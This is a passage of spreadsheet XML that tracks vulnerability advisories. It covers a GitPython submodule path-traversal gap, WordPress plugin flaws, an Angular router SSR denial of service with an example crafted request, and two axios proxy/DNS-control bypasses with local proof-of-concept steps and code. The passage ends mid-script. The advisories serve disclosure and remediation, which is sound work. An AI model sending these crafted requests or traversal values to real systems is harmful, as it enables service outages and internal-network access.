          <t>**Affected:** `GitPython` **3.1.61** (latest release) and `main` — `git/objects/submodule/base.py`. `git diff 3.1.61 origin/main -- git/objects/submodule/` is empty, so both are identical here.
---
## The gap
The fix for `GHSA-hmq2-w58f-27jc` added `Submodule._validated_name()` and wired it into `update()` and five siblings, closing the `.gitmodules` **name** → `.git/modules/&lt;name&gt;` traversal. The other attacker-controlled `.gitmodules` field, **`path`**, is read raw:
```python
# git/objects/submodule/base.py:172-177
def _set_cache_(self, attr):
    if attr in ("path", "_url", "_branch_path"):
        reader = self.config_reader()
        self.path = reader.get("path")          # raw .gitmodules value
```
and GitPython's own containment guard is applied in only two of the places that consume it:
```
400: def _to_relative_path(cls, parent_repo, path)      # the guard (abspath + commonpath containment)
542:     path = cls._to_relative_path(repo, path)        # add()   — guarded
1041:    module_checkout_path = self._to_relative_path(self.repo, module_path)   # move() — guarded
```
`update()` validates only the name and then uses the path-derived absolute location directly:
```
788:  self._validated_name(self.name)                    # NAME only
801:  checkout_module_abspath = self.abspath             # derived from self.path — unguarded
821:  os.makedirs(checkout_module_abspath, exist_ok=True)
```
So `path = ../../../tmp/escaped` in an attacker-authored `.gitmodules` selects the directory that gets created and, on the clone path, populated from the submodule URL. The same absolute location is what `force_remove` hands to `shutil.rmtree`.
The asymmetry is the argument: this is not a missing concept — the project wrote `_to_relative_path()` precisely for this, and `add()`/`move()` use it. `update()` does not.
## Honest limits (please read before rating)
- **The most common flow is not affected.** `Repo.clone_from(...)` → `repo.submodules` → `sm.update(init=True)` re-derives `path` from a canonical tree lookup, and real git refuses to check out a tree containing a `..` component, so an evil `.gitmodules` never lands in the working tree in the first place. A reachable trigger therefore requires the victim's code to name a **non-HEAD commit** (a historical-commit API such as `submodule_update(previous_commit=...)`).
- **The researcher did not build that end-to-end trigger.** The researcher only verified first-hand the code above: the guard's two call sites, the name-only validation in `update()`, and the unguarded `abspath` → `os.makedirs()` flow at 3.1.61 == `main`.
## Suggested fix
Apply the guard the project already has, wherever the path is consumed:
```python
# in update(), before deriving abspath (and in any other consumer of self.path):
checkout_rel = self._to_relative_path(self.repo, self.path)   # raises if it escapes the working tree
```
Better still, validate at the boundary: reject a `.gitmodules` entry whose `path` is absolute or contains a `..` component when the section is first read in `_set_cache_()`/`iter_items()`, so no consumer can be added later without the check. A regression test with `path = ../escaped` alongside the existing `name` test would pin both fields.
## Prior art checked
`GHSA-hmq2-w58f-27jc` (this is a residual of its fix, in the sibling field, not a re-report) plus the repository's 30 published advisories — none mentions the `path` field or `_to_relative_path`. Searched issues and PRs for `_to_relative_path`, `gitmodules path` and `submodule traversal`: no report of this.
## Credit
**kta1kri**.
---
## Appendix — `EVIDENCE_gitpython_path_unguarded_20260901.txt` (inlined; advisories accept no attachments)
```text
=== EVIDENCE: GitPython — the .gitmodules 'path' field reaches os.makedirs()/clone unguarded ===
Mon Aug 31 18:45:22 UTC 2026
--- artifact: tag 3.1.61 (latest release); git diff 3.1.61 origin/main -- git/objects/submodule/ is empty ---
--- the containment guard GitPython owns, and its only two call sites ---
33:    _to_relative_path,
400:    def _to_relative_path(cls, parent_repo: "Repo", path: PathLike) -&gt; PathLike:
407:            path = _to_relative_path(parent_repo.working_tree_dir, path)
542:        path = cls._to_relative_path(repo, path)
1041:        module_checkout_path = self._to_relative_path(self.repo, module_path)
--- the parent fix (_validated_name) call sites: it validates the NAME ---
309:    def _validated_name(cls, name: str) -&gt; str:
321:        name = cls._validated_name(name)
541:        cls._validated_name(name)
788:            self._validated_name(self.name)
1040:        self._validated_name(self.name)
1181:        self._validated_name(self.name)
1439:        self._validated_name(self.name)
1440:        self._validated_name(new_name)
1489:        self._validated_name(self.name)
--- update(): name validated, path not; abspath -&gt; os.makedirs ---
        try:
            self._validated_name(self.name)
            # ENSURE REPO IS PRESENT AND UP-TO-DATE
                # END early abort if init is not allowed
                checkout_module_abspath = self.abspath
                module_abspath = self._module_abspath(self.repo, self.path, self.name)
                # ``git submodule deinit`` leaves the repository in
                # ``.git/modules`` and empties the checkout. Reconnect that retained
                # repository instead of trying to clone over it.
                if not dry_run and osp.isdir(module_abspath):
                    try:
                        git.Repo(module_abspath)
                    except InvalidGitRepositoryError:
                        pass
                    else:
                        if osp.lexists(checkout_module_abspath) and (
                            osp.islink(checkout_module_abspath)
                            or not osp.isdir(checkout_module_abspath)
                            or os.listdir(checkout_module_abspath)
                        ):
                            raise OSError(
                                "Module directory at %r does already exist and is non-empty" % checkout_module_abspath
                            )
                        os.makedirs(checkout_module_abspath, exist_ok=True)
                        self._write_git_file_and_module_config(checkout_module_abspath, module_abspath)
                        mrepo = git.Repo(checkout_module_abspath)
--- where self.path comes from (raw .gitmodules value) ---
    def _set_cache_(self, attr: str) -&gt; None:
        if attr in ("path", "_url", "_branch_path"):
            reader: SectionConstraint = self.config_reader()
            # Default submodule values.
            try:
                self.path = reader.get("path")
            except cp.NoSectionError as e:
```</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100689</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101147</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>The Featured Image from URL (FIFU) WordPress plugin before 6.0.8, Featured Image from URL (FIFU) Premium WordPress plugin before 8.2.8 do not correctly enforce the REST API nonce, disabling the check for the whole request when a crafted URL is used, which could allow attackers to make a logged-in administrator perform any REST API action, such as creating a new administrator account, via a CSRF attack.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101147</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101148</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 does not properly validate its integration key, treating an unset or blank key as valid, which allows unauthenticated attackers to create and download full site backups, including the database with user password hashes, and to delete arbitrary files on the server, leading to sensitive data disclosure and site takeover.
The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 has been closed on WordPress.org since July 2024 and no fixed version is available. Remove it from any site where it is installed.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101148</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101896</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/router</t>
        </is>
      </c>
      <c r="M594" s="5" t="inlineStr">
        <is>
          <t>20.3.32, 21.2.24, 22.2.0</t>
        </is>
      </c>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8).
When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (`Record&lt;string, string&gt;`). When matrix parameter names or outlet names are numeric strings (such as `/a;990;2522`), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8's internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (`HOLEY_ELEMENTS`) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by `2522`) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment.
Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately **~350x**.
### Impact
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service.
* **High Amplification:** A single 11-byte segment (`/a;990;2522`) consumes ~20 KB–25 KB of V8 heap.
* **Low Concurrency Required:**
  * With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as **12–22 concurrent requests** crash a 256 MiB–512 MiB Node.js SSR worker.
  * With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion.
* **Client-side SPAs Unaffected:** Pure client-side Angular applications (Single Page Applications without SSR) are **not** vulnerable, as local browser memory consumption does not cross a security boundary.
### Attack Preconditions &amp; Vulnerable Configurations
An application is affected only if **all** of the following conditions are met:
* **SSR Enabled:** The application runs in a Server-Side Rendering environment powered by Node.js / V8.
* **Direct Router Parsing:** User-controlled request URLs are parsed by `@angular/router` during SSR.
* **No Reverse-Proxy Semicolon/Segment Filtering:** Upstream reverse proxies (Nginx, Cloudflare, ALB) forward URLs containing semicolons (`;`) and multiple path segments without stripping or rejecting them.
#### Exploit Payload Example
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
```http
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1
Host: example.com
```
Even with paths under 2 KB, overlapping requests during SSR will rapidly consume the V8 heap until the process crashes.
### Patches
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (`setUrlDerivedKey`) for numeric URL-derived keys (index &gt;= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
* `22.2.0`
* `21.2.24`
* `20.3.32`
### Workarounds &amp; Mitigations
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
1. **Block or Sanitize Matrix Parameters at the Reverse Proxy:**  
   Configure your reverse proxy (e.g., Nginx, Cloudflare, or AWS WAF) to reject or strip semicolons (`;`) in request paths before forwarding requests to the Angular SSR service:
   ```nginx
   # Nginx example: reject requests containing matrix parameters
   if ($uri ~* ";") {
       return 400;
   }
   ```
2. **Enforce Strict Path Segment Limits:**  
   Reject requests with excessive path depth (e.g., more than 20–30 segments).
3. **Increase Node.js Old Space:**  
   Increase `--max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101896</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M595" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js does not apply configured DNS lookup or proxy controls when a request uses `httpVersion: 2`. The HTTP/1 adapter path wraps and forwards `config.lookup`, builds normal request options, and applies proxy routing through `setProxy()`. The HTTP/2 path builds a session with `http2.connect()` using only `options.http2Options`, which drops the top-level `lookup`, `agent`, and proxy state.
Applications are affected when they allow a user to influence request destinations, enable axios HTTP/2, and rely on axios `lookup` or proxy routing to prevent SSRF or enforce outbound network policy.
## Impact
In affected server-side deployments, an attacker can cause axios to connect directly to destinations that the configured resolver or proxy would have rejected. Depending on reachable services, this can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems.
This is not an unconditional SSRF in every axios deployment. It requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by `lookup` or proxy policy.
## Affected Functionality
Affected:
- Node.js HTTP adapter with `httpVersion: 2`.
- `config.lookup` supplied as a DNS policy.
- Explicit `config.proxy` and environment-derived proxy settings for HTTPS HTTP/2 requests.
Not affected:
- Browser adapters.
- Node HTTP/1 requests, which pass `lookup` to the transport and apply proxy handling.
- Applications that validate destination hosts independently before calling axios.
## Technical Details
In `lib/adapters/http.js`, the adapter reads `lookup`, wraps it, stores it on the request `options`, and applies `setProxy()` before selecting a transport. For HTTP/2, `http2Transport.request()` builds an authority from `options.protocol`, `options.hostname`, and `options.port`, then calls:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` ultimately calls `http2.connect(authority, options)` with only the `http2Options` object. The configured DNS lookup and the proxy or tunneling agent installed on the top-level request options are not forwarded into that call.
Local verification on axios `1.18.1` showed `lookupCalls: 0` while an HTTP/2 request to a local h2 origin succeeded. A second local HTTPS h2 verification with an explicit rejecting HTTP proxy showed the origin received the request and the proxy observed no traffic.
## Proof of Concept of Attack
Local constrained demonstration:
1. Start an HTTP/2 server on loopback.
2. Call `axios.get("http://localhost:&lt;port&gt;/internal", { httpVersion: 2, lookup })` where `lookup` throws `EPOLICY`.
3. Observe that the request succeeds and the lookup counter remains `0`.
For proxy routing:
1. Start an HTTPS HTTP/2 origin and a local HTTP proxy that rejects every request and CONNECT.
2. Call axios with `httpVersion: 2`, `http2Options: { rejectUnauthorized: false }`, and explicit `proxy`.
3. Observe that the origin receives the request and the proxy receives nothing.
Expected safe behavior is that either the lookup policy blocks the request or the proxy observes and rejects the request.
## Workarounds
Use the HTTP/1 adapter path for requests that depend on axios `lookup` or proxy controls. Alternatively, enforce destination allow/deny policy before calling axios, outside the adapter transport path.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
  ### Summary
I found that Axios does not apply the configured `lookup` function or proxy when a request uses `httpVersion: 2`. The HTTP/1 adapter applies both controls, but the HTTP/2 path connects straight to the URL's hostname using `http2.connect()`.
This matters for server applications that accept a user-influenced URL and use a custom DNS lookup or mandatory outbound proxy to prevent SSRF. Switching the Axios instance to HTTP/2 silently removes those controls, allowing the request to reach an address the application intended to block.
I reproduced this on the current npm release, Axios 1.18.1.
### Details
The HTTP adapter reads and wraps the caller's `lookup` function, builds the normal request options, and calls `setProxy()`:
- `lib/adapters/http.js`, around lines 530-578: reads and wraps `lookup`
- `lib/adapters/http.js`, around lines 895-954: adds `lookup` to `options` and applies `setProxy()`
For HTTP/2, however, the adapter selects `http2Transport`. That transport creates an authority from the destination and only passes `options.http2Options` to the session pool:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` then calls:
```js
const session = http2.connect(authority, options);
```
At this point `options` is only the `http2Options` object. The top-level `lookup`, the proxy tunnelling agent created by `setProxy()`, and the selected `httpAgent`/`httpsAgent` are not forwarded. The request therefore uses the system resolver and opens a direct connection to the origin.
The same root cause affects both explicit proxy configuration and environment-derived proxy configuration. I kept the PoC local and used an explicit proxy so the result does not depend on shell environment variables.
### PoC
I attached [axios_http2_transport_controls_poc.mjs](https://drive.google.com/file/d/1lKXBOLDoysOFRmaRyV1tMVLx3P0Ah4gV/view?usp=sharing). The PoC is entirely local and sets up three pieces:
1. An HTTPS origin with HTTP/2 enabled. If reached, it records the request and returns `REACHED_BLOCKED_ORIGIN`.
2. An HTTP proxy that records traffic but rejects every normal request and every CONNECT request with `502 Bad Gateway`.
3. A custom Axios `lookup` callback that rejects every DNS lookup with an `EPOLICY` error.
The first request is an HTTP/1 control request. It uses the blocking `lookup` callback and has proxying disabled. Axios calls the callback, receives `EPOLICY`, and does not reach the origin. This confirms that the callback works and that the hostname is blocked through the normal adapter path.
The second request targets the same URL with `httpVersion: 2`. It is given both security controls: the same blocking `lookup` callback and the rejecting proxy. If Axios honors either one, this request cannot reach the origin. It should fail with `EPOLICY`, or it should reach the proxy and receive its `502` response.
Instead, the request returns HTTP 200 with `REACHED_BLOCKED_ORIGIN`. The lookup counter does not increase, and the proxy records no request or CONNECT attempt. The origin is the only server that records traffic. This shows that the HTTP/2 path skipped both controls and connected directly using the system resolver.
To reproduce, run the attachment from the root of an Axios checkout:
Run it from the root of an Axios checkout:
```bash
git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs
```
Relevant output from my run:
```json
{
  "axiosVersion": "1.18.1",
  "configuredControls": {
    "lookup": "reject every DNS lookup with EPOLICY",
    "proxy": "http://127.0.0.1:&lt;port&gt; (reject every request)"
  },
  "http1Control": "EPOLICY: blocked by application DNS policy",
  "http2Result": {
    "status": 200,
    "data": "REACHED_BLOCKED_ORIGIN"
  },
  "lookupCalls": 1,
  "proxyObservedTraffic": false,
  "events": [
    {
      "server": "origin",
      "protocol": "h2",
      "path": "/internal"
    }
  ]
}
```
The important parts of the output are:
- `http1Control` contains `EPOLICY`, proving the DNS policy blocks the destination under HTTP/1.
- `lookupCalls` is still `1` after both requests, proving HTTP/2 never called the configured resolver.
- `proxyObservedTraffic` is `false`, proving HTTP/2 did not use the configured proxy.
- `http2Result.status` is `200`, and the sole event belongs to the origin, proving Axios connected directly to the blocked destination.
### Impact
The vulnerable configuration is a Node.js application that:
- enables Axios HTTP/2 using `httpVersion: 2`;
- lets an application user influence the request destination; and
- relies on Axios's `lookup` option or proxy routing to enforce a destination or egress policy.
In that setup, an unauthenticated application user may be able to make the server connect directly to loopback, private-network, or link-local services that the lookup policy or proxy would have rejected. Depending on the reachable service, this can expose cloud credentials or internal data, modify internal services, or affect availability.
HTTP/2 support is marked experimental, but neither the HTTP/2 documentation nor the proxy documentation says that `lookup` and proxy controls are ignored. The proxy documentation states that HTTPS requests are sent through a CONNECT tunnel. More importantly, Axios's threat model tells callers that destination validation is their responsibility; this behavior silently bypasses such caller-supplied validation.
I did not test against any third-party or production service. The PoC only uses listeners on my own machine.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101899</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M596" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios supports proxy environment variables and evaluates `NO_PROXY` exclusions in the Node.js adapter. CIDR-form `NO_PROXY` entries such as `127.0.0.0/8`, `10.0.0.0/8`, or `169.254.169.254/32` are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.
This affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.
## Impact
If the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.
This is a proxy exclusion bypass, not arbitrary proxy injection by itself.
## Affected Functionality
Affected:
- Node.js adapter proxy environment handling.
- `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, or lowercase equivalents.
- CIDR entries in `NO_PROXY`.
Not affected:
- Exact host or exact IP `NO_PROXY` entries where axios matching succeeds.
- Requests configured with `proxy: false`.
- Browser adapters.
## Technical Details
`lib/helpers/shouldBypassProxy.js` parses each `NO_PROXY` entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.
Local verification on axios `1.18.1`:
```js
process.env.NO_PROXY = '127.0.0.0/8';
shouldBypassProxy('http://127.0.0.1:1234/'); // false
```
The expected result for CIDR-aware bypass policy is `true`.
## Proof of Concept of Attack
Constrained local demonstration:
1. Set `HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;`.
2. Set `NO_PROXY=127.0.0.0/8`.
3. Request `http://127.0.0.1:&lt;internal-port&gt;/metadata`.
4. Observe that axios sends the request through the proxy instead of directly to the internal listener.
## Workarounds
Use exact host or IP entries in `NO_PROXY` for sensitive destinations until CIDR matching is fixed, for example `127.0.0.1,localhost,169.254.169.254`. For individual requests that must not use a proxy, set `proxy: false`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy.
In the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`.
This can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying.
## Details
Axios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios’s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack
The issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:
```text
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;
Target URL=http://127.0.0.1:&lt;internal-port&gt;/metadata
```
Since `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`.
This appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios's Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks.
The issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied.
This is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:
```text
127.0.0.0/8
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.169.254/32
```
If operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation.
## PoC
```js
import http from 'http';
import axios from 'axios';
function listen(server, host) {
  return new Promise((resolve, reject) =&gt; {
    server.once('error', reject);
    server.listen(0, host, () =&gt; resolve(server.address().port));
  });
}
function close(server) {
  return new Promise((resolve) =&gt; server.close(resolve));
}
let proxyHits = 0;
let internalHits = 0;
const internal = http.createServer((req, res) =&gt; {
  internalHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`internal service saw ${req.url}`);
});
const proxy = http.createServer((req, res) =&gt; {
  proxyHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`proxy saw request for ${req.url}`);
});
const internalHost = process.env.POC_INTERNAL_HOST || '127.0.0.2';
const proxyHost = process.env.POC_PROXY_HOST || '127.0.0.1';
let internalPort;
let proxyPort;
try {
  internalPort = await listen(internal, internalHost);
  proxyPort = await listen(proxy, proxyHost);
} catch (error) {
  console.error('Failed to bind local PoC servers.');
  console.error('On some systems 127.0.0.2 is unavailable; try:');
  console.error('  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs');
  console.error('');
  throw error;
}
const targetUrl = `http://${internalHost}:${internalPort}/metadata`;
const proxyUrl = `http://${proxyHost}:${proxyPort}`;
const noProxy = process.env.POC_NO_PROXY || '127.0.0.0/8';
process.env.http_proxy = proxyUrl;
process.env.HTTP_PROXY = proxyUrl;
process.env.no_proxy = noProxy;
process.env.NO_PROXY = noProxy;
console.log('Axios NO_PROXY CIDR full axios network PoC');
console.log(`axios VERSION=${axios.VERSION || 'unknown'}`);
console.log(`NO_PROXY=${process.env.no_proxy}`);
console.log(`HTTP_PROXY=${process.env.http_proxy}`);
console.log(`Target URL=${targetUrl}`);
console.log('');
try {
  const response = await axios.get(targetUrl, {
    timeout: 2000,
  });
  console.log(`Response=${response.data}`);
  console.log(`Proxy hits=${proxyHits}`);
  console.log(`Internal direct hits=${internalHits}`);
  console.log('');
  if (proxyHits &gt; 0 &amp;&amp; internalHits === 0) {
    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);
